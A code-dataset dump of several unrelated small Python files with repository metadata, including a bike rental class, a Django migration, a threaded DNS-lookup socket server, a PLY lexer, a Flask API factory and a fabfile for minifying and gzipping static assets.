help='path of the coordinates file to convert')
parser.add_argument('--name', dest='name',
type=str,
metavar=('<name>'),
help='name of the .OBJ file generated (no extension)')
parser.add_argument('--extrusion-limits', dest='extrusion_limits',
type=float, nargs=2,
default=[0.0, 1.0],
metavar=('start', 'end'),
help='limits of the extrusion in the 3rd direction')
parser.add_argument('--save-directory', dest='save_directory',
type=str,
default=os.getcwd(),
metavar=('<directory>'),
help='directory where to save the .obj file')
# parse given options file
parser.add_argument('--options',
type=open, action=miscellaneous.ReadOptionsFromFile,
metavar=('<path>'),
help='path of the file with options to parse')
print('done')
return parser.parse_args()
def main():
"""Generates an .OBJ file from a given coordinates file."""
args = parse_command_line()
body = OBJFile.Body2d(args.file_path,
name=args.name,
extrusion_limits=args.extrusion_limits)
body.write(save_directory=args.save_directory)
if __name__ == '__main__':
print('\n[{}] START\n'.format(os.path.basename(__file__)))
main()
print('\n[{}] END\n'.format(os.path.basename(__file__))) | [
"mesnardo@gwu.edu"
] | mesnardo@gwu.edu |
0f02c25f0dcf3729964ffb43624483cced191392 | 903e81d4f5c9a6067df4df987213478ed16f67f6 | /Bike_Rental_System/BikeRental.py | ec33d4e7220dd8014455b40ec6150c2968e774cc | [] | no_license | imdadhaq/Oop-Bike-Rental-System | d873a8e3dc874f79939f89f51838648dab4b2494 | 3a85703524b54e011dec9219aaedda3a46a1e038 | refs/heads/main | 2023-07-08T22:38:53.096250 | 2021-08-09T15:41:13 | 2021-08-09T15:41:13 | 394,348,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,204 | py | import datetime
class BikeRental:
# initialize stock
def __init__(self, stock=0):
self.stock = stock
# Display the Bikes are currently available
def displaystock(self):
print("We have Currently {} bikes avaiable to rent ".format(self.stock))
return self.stock
# Rent bike on basis of hour
def rentbikeOnhour(self, n):
if n <= 0:
print("Number of Bikes Should be positive ")
return None
elif n > self.stock:
print("Sorry! We have currently {} bikes available to rent.".format(self.stock))
return None
else:
now = datetime.datetime.now()
print("you have ranted a {} Bikes(s) on a hourly basis today {} at hours ".format(n, now.hour))
print("You will be charged $5 for each hour per bike ")
print("We hope that you enjoy our service")
self.stock -= n
return now
def rentbikeOndaily(self, n):
if n <= 0:
print("Number of Bikes Should be positive ")
return None
elif n > self.stock:
print("Sorry! We have currently {} bikes available to rent.".format(self.stock))
return None
else:
now = datetime.datetime.now()
print("you have ranted a {} Bikes(s) on daily basis today {} at hours ".format(n, now.hour))
print("You will be charged $5 for each hour per bike ")
print("We hope that you enjoy our service")
self.stock -= n
return now
def rentbikeOnWeek(self, n):
if n <= 0:
print("Number of Bikes Should be positive ")
return None
elif n > self.stock:
print("Sorry! We have currently {} bikes available to rent.".format(self.stock))
return None
else:
now = datetime.datetime.now()
print("you have ranted a {} Bikes(s) on Weekly basis today {} at hours ".format(n, now.hour))
print("You will be charged $5 for each hour per bike ")
print("We hope that you enjoy our service")
self.stock -= n
return now
def returnBike(self, request):
"""
1. Accept a rented bike from a customer
2. Replensihes the inventory
3. Return a bill
"""
rentalTime, rentalBasis, numOfBikes = request
bill = 0
if rentalTime and rentalBasis and numOfBikes:
self.stock += numOfBikes
now = datetime.datetime.now()
rentalPeriod = now - rentalTime
# hourly bill calculation
if rentalBasis == 1:
bill = round(rentalPeriod.seconds / 3600) * 5 * numOfBikes
# daily bill calculation
if rentalBasis == 2:
bill = round(rentalPeriod.days) * 20 * numOfBikes
# weekly bill calculation
if rentalBasis == 3:
bill = round(rentalPeriod.days / 7) * 60 * numOfBikes
if (3 <= numOfBikes <= 5):
print("YOu are eligible for family rental promotion of 30% discount")
bill = bill * 0.7
print("Thanks for returning your bike. Hope you enjoyed our service!")
print("That would be ${}".format(bill))
else:
print("Are you sure you rented a bike with us?")
return None
class Customer:
def __init__(self):
self.bike = 0
self.rentalBasis = 0
self.rentalTime = 0
self.bill = 0
def requestBike(self):
try:
bikes = int(input("how many bikes would you like to rent?"))
except ValueError:
print("That's not a postive integer ")
return -1
if bikes < 1:
print("Invalid input .Number of Bikes should be greater than zero !")
return -1
else:
self.bikes = bikes
return self.bikes
def returnBike(self):
if self.rentalBasis and self.rentalTime and self.bikes:
return self.rentalBasis and self.rentalTime and self.bikes
else:
return 0, 0, 0
| [
"imdadhaque2210@gmail.com"
] | imdadhaque2210@gmail.com |
12d4cddcaf7218ea7fe7c363f8c5fb94f5bcd2e0 | 1688311b1287e9d38e27a44388f50568d9e07ea2 | /blog/migrations/0007_auto_20190722_1243.py | 8f8bf2ccf0851b2052ef4963725ead7c1d81589d | [] | no_license | Leeheejin1/teamprjt | e7e606b9411fde1b772f02ac27350304085a545a | 8d3ab815b143597f6c2d4e912ef8a1549abb516d | refs/heads/master | 2022-12-12T11:54:48.500322 | 2019-07-25T06:33:24 | 2019-07-25T06:33:24 | 198,760,424 | 0 | 0 | null | 2022-12-08T05:55:41 | 2019-07-25T05:00:13 | JavaScript | UTF-8 | Python | false | false | 1,129 | py | # Generated by Django 2.2 on 2019-07-22 03:43
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0006_auto_20190531_1715'),
]
operations = [
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_date', models.DateTimeField(auto_now_add=True)),
('comment_contents', models.CharField(max_length=200)),
('post', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.Post')),
],
options={
'ordering': ['-id'],
},
),
]
| [
"dlgmlwls3133@naver.com"
] | dlgmlwls3133@naver.com |
c7432b46e7815589e67b5f13126792906baa874b | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog_tags/optimized_659.py | 2a149860964006fc23b9d40cde8de4ed76a7020a | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,583 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog1_Anch" not in marker_sets:
s=new_marker_set('Cog1_Anch')
marker_sets["Cog1_Anch"]=s
s= marker_sets["Cog1_Anch"]
mark=s.place_marker((513.189, 440.035, 538.548), (0, 0, 1), 21.9005)
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((570.351, 361.611, 332.233), (1, 0.5, 0), 21.9005)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((553.44, 456.734, 234.315), (1, 0.5, 0), 21.9005)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((596.433, 688.793, 431.456), (1, 0.5, 0), 21.9005)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((565.199, 405.652, 345.85), (1, 0.87, 0), 21.9005)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((579.294, 381.001, 348.501), (1, 0.87, 0), 21.9005)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((368.44, 406.247, 367.378), (1, 0.87, 0), 21.9005)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((448.219, 577.439, 439.358), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((307.69, 553.195, 375.403), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((783.564, 349.669, 391.617), (0.97, 0.51, 0.75), 21.9005)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((574.444, 482.119, 400.257), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((585.011, 387.232, 281.884), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((580.031, 621.288, 368.759), (0.39, 0.31, 0.14), 21.9005)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((579.496, 421.971, 322.229), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((561.886, 406.09, 420.253), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((410.629, 371.023, 343.742), (0.6, 0.31, 0.64), 21.9005)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((602.083, 424.911, 407.51), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((622.903, 431.478, 254.626), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((540.708, 579.704, 242.646), (0.89, 0.1, 0.1), 21.9005)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((602.373, 438.065, 358.834), (0.3, 0.69, 0.29), 21.9005)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((660.617, 589.743, 366.602), (0.3, 0.69, 0.29), 21.9005)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
191c02bf89080200ebe8e1069aea04fcdc50c317 | 0c9918f2e14ea5f63f6780ddcb24ae38fd98d1e7 | /sha.py | aaa1d6155e4148af04137a197c272ddf99954b5f | [] | no_license | oguzpamuk/oguzpamuk.com | 73889fc4b7439f83bab23b7604de4792fcf661f6 | a99d1e862f89b9be850b6beb25bef50a9ce4a163 | refs/heads/master | 2020-05-23T08:05:23.585172 | 2016-11-12T13:02:08 | 2016-11-12T13:02:08 | 69,728,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Author : Oguz Pamuk
Date : 12.11.2016
'''
import hashlib
def getSHA1ValueForString(plaintext):
instance = hashlib.sha1()
instance.update(plaintext)
return instance.hexdigest()
def getSHA224ValueForString(plaintext):
instance = hashlib.sha224()
instance.update(plaintext)
return instance.hexdigest()
def getSHA256ValueForString(plaintext):
instance = hashlib.sha256()
instance.update(plaintext)
return instance.hexdigest()
def getSHA384ValueForString(plaintext):
instance = hashlib.sha384()
instance.update(plaintext)
return instance.hexdigest()
def getSHA512ValueForString(plaintext):
instance = hashlib.sha512()
instance.update(plaintext)
return instance.hexdigest()
print getSHA1ValueForString("oguz")
print getSHA224ValueForString("oguz")
print getSHA256ValueForString("oguz")
print getSHA384ValueForString("oguz")
print getSHA512ValueForString("oguz")
| [
"oguzcanpamuk@gmail.com"
] | oguzcanpamuk@gmail.com |
b0e2004c44bed1e345528f2bcf3f3a675e16cb6e | ccbfc3dcc7fdd7b1cf245cadbc1b73f555ba1912 | /.pybuilder/plugins/cpython-3.6.9.final.0/bin/flake8 | 85ae548865b7e6570e57b01064285b6ebd58e6ab | [] | no_license | dwalke22/cs3280Project5 | 028b4655b7d3433a018838052ac2bd34ad9665d1 | b73187ad348afa6f8c3164a28e5b3caff2c8420b | refs/heads/master | 2023-01-19T22:35:42.196076 | 2020-12-02T18:40:58 | 2020-12-02T18:40:58 | 316,641,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | #!/home/dwalke22/Desktop/cs3280Project5/.pybuilder/plugins/cpython-3.6.9.final.0/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flake8.main.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"dwalke22@cs3280-vm10.uwg.westga.edu"
] | dwalke22@cs3280-vm10.uwg.westga.edu | |
4771d33f450e1a572a88312fad7e53a8ee9587d5 | 288710df36e1fc95f34a8b550ab7c26e59067af7 | /Naming_Service_Project /server.py | e9b2be55068be83ec6d834e82be73c9564bfc808 | [] | no_license | nadrane/LearnC | 0b0f25cdf89f20292d402d60a785a51a6e06062f | 9f0d67c0ee66111052d20e8e029307317c5891bc | refs/heads/master | 2020-04-10T19:08:06.423197 | 2015-03-04T15:22:14 | 2015-03-04T15:22:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,566 | py | import socket
import threading
import signal
MAX_RECEIVE_LENGTH = 2048
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stop = threading.Event()
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.is_set()
class SocketHoldingThread(StoppableThread):
def __init__(self, socket, *args, **kwargs):
super(SocketHoldingThread, self).__init__(*args, **kwargs)
self.socket = socket
def terminate(self):
# Close the open socket
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
# There are going to be cases where we accidentally try to close the socket twice
# e.g., the process is killed, and the parent and child both try to close it
except OSError:
pass
self.stop()
def run_server():
thread_list= [] # A list of all open client conncetions. Stores type Connection
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# We need to create a closure here so that clean_up (a signal handler) has access to the stored threads.
# This is necessary because we cannot explicitly pass parametes to handlers.
# The alternative is that thread_list is global
def clean_up(signal, frame):
# Iterate only over threads that are still running.
# Threads can shut themselves down without notifying the parent again (when close to sent).
# We don't need to trying closing the sockets associated with those threads a second time.
for thread in filter(lambda x: not x.stopped(), thread_list):
thread.terminate()
server_socket.close()
return
# Set the signal handler for
signal.signal(signal.SIGINT, clean_up)
# Reuse sockets that are in the TIME_WAIT state. This setting lets us rapidly shutdown the program and restart it.
# http://serverfault.com/questions/329845/how-to-forcibly-close-a-socket-in-time-wait
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to a public host, and a well-known port
server_socket.bind(('127.0.0.1', 8000))
# become a server socket
server_socket.listen(5)
while True:
print ('Waiting for additional client')
# The program will be exited by using a ctrl-c command.
# When this happpens server_socket.accept fails ungracefully and raises an EINTR
# Catch this and gracefully kill off the child threads and close the open sockets
try:
client_socket, address = server_socket.accept()
# This happened from click ctrl-c. The signal handler will actually close
# all of the connections before this exception is handled, so no need to close them again
except InterruptedError:
return
print ('New connection established')
client_socket.send('Thank you for connecting to the server\n'.encode('ascii'))
# Create a new thread to handle the domain name resolution process.
new_thread = SocketHoldingThread(socket=client_socket, target=address_resolver)
thread_list.append(new_thread)
new_thread.start()
def address_resolver():
current_thread = threading.current_thread()
client_socket = current_thread.socket
while not current_thread.stopped():
current_thread.socket.sendall('Please enter a domain name\n'.encode('ascii'))
# If this fails, just sever the connection with the client
try:
response = client_socket.recv(MAX_RECEIVE_LENGTH).decode('ascii')
except OSError:
current_thread.terminate()
break
# Telnet likes to append a pesky line feed. Let's get rid of it
response = response.rstrip()
if response == 'close':
current_thread.terminate()
break
print ('Looking up hostname {}'.format(response))
ip_address = socket.gethostbyname(response)
# If this fails, just sever the connection with the client
try:
client_socket.sendall('The ip address is {ip_address}\n'.format(ip_address=ip_address).encode('ascii'))
except OSError:
current_thread.terminate()
break
return
if __name__ == "__main__":
run_server()
| [
"nicholasdrane@gmail.com"
] | nicholasdrane@gmail.com |
46c542c9c5dd88deb06d9cc8b2a7920ee17809fd | 08642798431f3dda1cf0529acb4435c9f38f3140 | /tests/RunTest.py | 10fb7c0152f524d5994ef0b3c873b5e8aca326b9 | [
"MIT"
] | permissive | dsoon/pseudonaja | 13bb11938d7c9483a42351624a802b97468190ca | 2c94ba82efaae9bdf2b3f80d4f31b35b467c7d93 | refs/heads/master | 2023-08-26T18:27:58.365955 | 2021-10-20T12:29:32 | 2021-10-20T12:29:32 | 356,291,608 | 1 | 1 | MIT | 2021-10-20T11:27:33 | 2021-04-09T14:04:21 | Python | UTF-8 | Python | false | false | 1,695 | py | import sys, os
sys.path += ['pseudonaja']
print(os.getcwd())
import pseudonaja.c.PInterpreter as pscint
import json
class RunTest:
class Keyboard:
def __init__(self, inputs):
self.lines = inputs
self.count = -1
def readline(self):
self.count += 1
return self.lines[self.count]
class Screen:
def __init__(self):
self.lines = []
def write(self, line):
self.lines.append(line)
def flush(self):
'''
'''
pass
def __str__(self):
return "".join(self.lines)
def compare(self, name, outputs, screen):
outputs = "".join(outputs)
'''
def dump(a, e):
for i, c in enumerate(a):
print(f"{i} a={c} e={outputs[i] if i < len(outputs) else None}")
dump(''.join(self.lines), outputs)
'''
assert ''.join(self.lines) == outputs, f"Test failed ({name})\n\nTest output\n{screen}\n\nExpected output\n{outputs}"
print(f"Test ({name}) successful")
def __init__(self, testfile):
# read file
with open(testfile+".json", 'r') as t:
data = t.read()
# parse file
test = json.loads(data)
import sys
sys.stdin = RunTest.Keyboard(test['inputs'])
stdout_save = sys.stdout
s = RunTest.Screen()
sys.stdout = s
pscint.PInterpreter().run('\n'.join(test['code']))
sys.stdout = stdout_save
s.compare(test['name'], test['outputs'], s)
if __name__ == "__main__":
RunTest("pseudonaja/tests/Test4") | [
"david.soon@outlook.com"
] | david.soon@outlook.com |
9a30a5346928151a8854ade6050e0044f260903c | 443ac26b4484b30512022ad3d11a1479e2a274c1 | /lexer_rules.py | 76d9e18bfa263517de30c5653b34e6ab66d791e8 | [] | no_license | eduardpii/Lexer_Parser | 5f98ae0a109828c96a50d4d4e519a5dae5f5d4f7 | 2eecb62f91a3ecdba5b742d897f4db9c288f38c8 | refs/heads/master | 2020-03-17T11:21:35.031988 | 2018-05-15T20:12:44 | 2018-05-15T20:12:44 | 133,548,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | import sys
import re
import ply.lex as lex
tokens = ['NUMBER','PLUS','TIMES','LPAREN','RPAREN','MINUS','DIVIDE' ]
t_ignore = ' \t\n'
t_PLUS = r"\+"
t_TIMES = r"\*"
t_LPAREN = r"\("
t_RPAREN = r"\)"
t_MINUS = r"-"
t_DIVIDE = r"/"
def t_NUMBER(token):
r"[1-9][0-9]*"
token.value = int(token.value)
return token
t_ignore_WHITESPACES = r"[ \t]+"
def t_NEWLINE(token):
r"\n+"
token.lexer.lineno += len(token.value)
def t_error(token):
message = "Token desconocido:"
message = "\ntype:" + token.type
message += "\nvalue:" + str(token.value)
message += "\nline:" + str(token.lineno)
message += "\nposition:" + str(token.lexpos)
raise Exception(message)
| [
"noreply@github.com"
] | noreply@github.com |
1e3d9cea7ebe335cd86c44fb107dd4becb2b36f5 | 34e07a5a711c52c4b0aabd353ec0bf06e93edfa7 | /feature_importance.py | 7a51ff2481d6fd8b081d410038b07c0c76613c0d | [] | no_license | Tools-Demo/PR_CodeSmells | bc769c2ea1b3de6c37da8990c4b65b8efd557255 | 81c8f1574fb66c44e8f68da652c2febb61e5fd48 | refs/heads/main | 2023-07-19T23:41:07.128083 | 2023-07-12T07:46:25 | 2023-07-12T07:46:25 | 390,305,788 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,653 | py | # Calculate Feature importance
# random forest for feature importance on a classification problem
import pandas as pd
from sklearn.datasets import make_regression
from sklearn.ensemble import RandomForestClassifier
from matplotlib import pyplot
import seaborn as sns
import matplotlib.pyplot as plt
df = pd.read_csv("Dataset/25_projects_PRs.csv", sep=',', encoding='utf-8')
df['src_churn'] = df['Additions'] + df['Deletions']
df['num_comments'] = df['Review_Comments_Count'] + df['Comments_Count']
df['is_God_Class'] = df['GodClass'].apply(lambda x: 1 if x>0 else 0)
df['is_Data_Class'] = df['DataClass'].apply(lambda x: 1 if x>0 else 0)
df['is_Long_Method'] = df['ExcessiveMethodLength'].apply(lambda x: 1 if x>0 else 0)
df['is_Long_Parameter_List'] = df['ExcessiveParameterList'].apply(lambda x: 1 if x>0 else 0)
df.loc[(df['GodClass'] > 0) | (df['DataClass'] > 0) | (df['ExcessiveMethodLength'] > 0) |
(df['ExcessiveParameterList'] > 0), 'is_smelly'] = 1
df.loc[df['is_smelly'].isnull(), 'is_smelly'] = 0
# Previous work features
accept_baseline = ['src_churn', 'Commits_PR', 'Files_Changed', 'num_comments','Followers','Participants_Count',
'Team_Size', 'File_Touched_Average', 'Commits_Average', 'Prev_PRs', 'is_smelly', #'Project_Size',
'User_Accept_Rate', 'PR_Time_Created_At', 'PR_Date_Closed_At', 'PR_Time_Closed_At',
'PR_Date_Created_At', 'Project_Name', 'PR_accept']
df = df[accept_baseline]
target = 'is_smelly'
predictors = [x for x in df.columns if x not in [target, 'PR_Date_Created_At', 'PR_Time_Created_At', 'PR_Date_Closed_At',
'PR_Time_Closed_At', 'Project_Name', 'PR_accept']]
df = df.dropna()
X = df[predictors]
y = df[target]
# define the model
model = RandomForestClassifier()
# fit the model
model.fit(X, y)
# get importance
importance = model.feature_importances_
#do code to support model
#"data" is the X dataframe and model is the SKlearn object
feats = {} # a dict to hold feature_name: feature_importance
for feature, importance in zip(df.columns, model.feature_importances_):
feats[feature] = importance #add the name/value pair
importances = pd.DataFrame.from_dict(feats, orient='index').rename(columns={0: 'Feature_importance'})
importances = importances.head(-1)
sns.set(rc={"figure.figsize":(20, 10)}) #width=3, #height=4
sns.set(font_scale=2) # crazy big
plt.xticks(rotation=45)
sns.barplot(data=importances.sort_values(by='Feature_importance'), x=importances.index, y="Feature_importance", palette=sns.color_palette(["#477ba8"])) | [
"noreply@github.com"
] | noreply@github.com |
27be5fc47a6b530183918059c4a5da41219fe0ae | fb382bb253b1d3ef50009421d2fe266824d10a84 | /peach/handlers/flask/api.py | c981210b320d105119d7df9d5cd12d61661200e5 | [
"MIT"
] | permissive | craigpmc/peach | e29f260fa03cf35214f5a7347846e25958c72d54 | 503a0b00ed1562e8d619c5c6f4ca5be6c1d17339 | refs/heads/master | 2020-03-26T06:56:12.993223 | 2017-05-13T23:01:54 | 2017-05-13T23:01:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | import flask_restful
from flask import Blueprint, jsonify, make_response
from peach.rest.base_api import ApiFactory, ApiException
class FlaskApiFactory(ApiFactory):
def _build_api(self, app, api_def):
api_blueprint = Blueprint(api_def.name, api_def.name, url_prefix=api_def.prefix)
api_blueprint.conf = api_def.conf
rest_api = FlaskRestApi(app=api_blueprint,
name=api_def.name,
version=api_def.version,
media_type=api_def.mediatype)
for name, endpoint in api_def.endpoints.items():
rest_api.add_resource(endpoint.handler,
*endpoint.urls,
endpoint=name,
resource_class_kwargs=endpoint.params)
return api_blueprint
class FlaskRestApi(flask_restful.Api):
MEDIA_TYPE = 'application/json'
DEFAULT_HEADER = {'Content-Type': MEDIA_TYPE}
def __init__(self,
app,
name=None,
version=None,
media_type=None,
**kwargs):
super().__init__(app=app, default_mediatype=media_type or self.MEDIA_TYPE, **kwargs)
@app.route('/')
def main():
return jsonify({
'name': name or 'Peach Rest Api',
'version': version or '0.0.0',
})
def handle_error(self, e):
if isinstance(e, ApiException):
error_response = make_response(jsonify(e.data), e.status)
error_response = '{}' if e.status == 200 else error_response
else:
error_response = super().handle_error(e)
return error_response
| [
"seba@localhost.localdomain"
] | seba@localhost.localdomain |
20defbd45e630ebdc24a72142a0151dac547f4f5 | df97a91911f59afea36aef2269e5842b2fedd170 | /fabfile.py | 4f2c0c5198d5ab4b254fa84df26c0ff71f532881 | [] | no_license | TheLens/demolitions | 9944003abdbadaacce9b5310a65f44b7054a070c | fc1fffc9ea61205b008eb4f04f8d9699aaf1ef27 | refs/heads/master | 2021-01-16T22:28:46.106695 | 2015-09-04T16:34:14 | 2015-09-04T16:34:14 | 39,971,839 | 2 | 0 | null | null | null | null | UTF-8 | Python | true | false | 6,406 | py | # -*- coding: utf-8 -*-
'''
Methods for deploying to S3.
'''
from fabric.api import local
from scripts import PROJECT_DIR
def minify():
'''Minify static assets.'''
minify_js()
minify_css()
def minify_js():
'''Minify JS files.'''
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
local(
'shopt -s nullglob\n' +
'for f in %s/*.js; do\n' % js_dir +
' if [[ $f == *".min."* ]]; then\n' +
' continue\n' +
' fi\n' +
' filename="${f%.*}"\n' +
' yuicompressor $f -o $filename.min.js\n' +
'done'
)
def minify_css():
'''Minify CSS files.'''
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
local(
'shopt -s nullglob\n' +
'for f in %s/*.css; do\n' % css_dir +
' if [[ $f == *".min."* ]]; then\n' +
' continue\n' +
' fi\n' +
' filename="${f%.*}"\n' +
' yuicompressor $f -o $filename.min.css\n' +
'done'
)
local(
'shopt -s nullglob\n' +
'for f in %s/*.css; do\n' % skin_dir +
' if [[ $f == *".min."* ]]; then\n' +
' continue\n' +
' fi\n' +
' filename="${f%.*}"\n' +
' yuicompressor $f -o $filename.min.css\n' +
'done'
)
def gzip():
'''gzip static assets.'''
gzip_html()
gzip_js()
gzip_json()
gzip_css()
def gzip_html():
'''gzip HTML files.'''
html_dir = '%s/demolitions/static/html' % PROJECT_DIR
temp_dir = '%s/html_temp' % html_dir
local('mkdir %s' % temp_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.html; do\n' % html_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_dir +
'done')
def gzip_js():
'''gzip JavaScript files.'''
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
temp_dir = '%s/js_temp' % js_dir
local('mkdir %s' % temp_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.min.js; do\n' % js_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_dir +
'done')
def gzip_json():
# JSON
app_data_dir = '%s/data/app' % PROJECT_DIR
temp_dir = '%s/json_temp' % app_data_dir
local('mkdir %s' % temp_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.json; do\n' % app_data_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_dir +
'done')
def gzip_css():
'''gzip CSS files.'''
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
temp_css_dir = '%s/css_temp' % css_dir
temp_skin_dir = '%s/skin_temp' % skin_dir
local('mkdir %s' % temp_css_dir)
local('mkdir %s' % temp_skin_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.min.css; do\n' % css_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_css_dir +
'done')
local(
'shopt -s nullglob\n' +
'for f in %s/*.min.css; do\n' % skin_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_skin_dir +
'done')
def clean_gzip():
html_dir = '%s/demolitions/static/html' % PROJECT_DIR
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
app_data_dir = '%s/data/app' % PROJECT_DIR
local('rm -rf %s/html_temp' % html_dir)
